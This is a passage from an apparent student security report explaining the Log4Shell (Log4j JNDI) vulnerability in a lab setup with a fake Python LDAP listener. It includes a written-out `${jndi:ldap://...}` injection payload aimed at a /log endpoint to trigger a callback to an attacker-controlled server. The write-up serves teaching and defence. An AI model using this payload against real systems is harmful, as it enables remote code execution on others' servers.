stephen-carver-dc8/seas-8405-carver-hw9/deliverables/report.md

     * The attacker's LDAP server (simulated by `ldap_server.py` which listens for connections and received data) can then serve a JNDI reference that points to a remote Java class file.
     * The vulnerable Java application will deserialize or load this remote class, leading to Remote Code Execution (RCE) on the application server.

-**Demonstration with Provided Files:**

-* The `docker-compose.yml` sets up the Java application (`app`) and an LDAP server (`ldap`).
-While the provided `ldap` service in `docker-compose.yml` is `osixia/openldap`, the exploit typically involves the JNDI lookup pointing to an *external* attacker-controlled LDAP server.
-The `ldap_server.py` is a simple Python script that can act as a fake LDAP server listening for connections, demonstrating that a callback can be received.
-* If an attacker sends `${jndi:ldap://<ip_of_machine_running_ldap_server.py>:389/Exploit}` to the `/log` endpoint of the "before" application, the Log4j library would attempt to connect to the Python LDAP server.
-The `ldap_server.py` would print a message indicating a connection was received.

 ---

 ## 4. Mitigation and Response Summary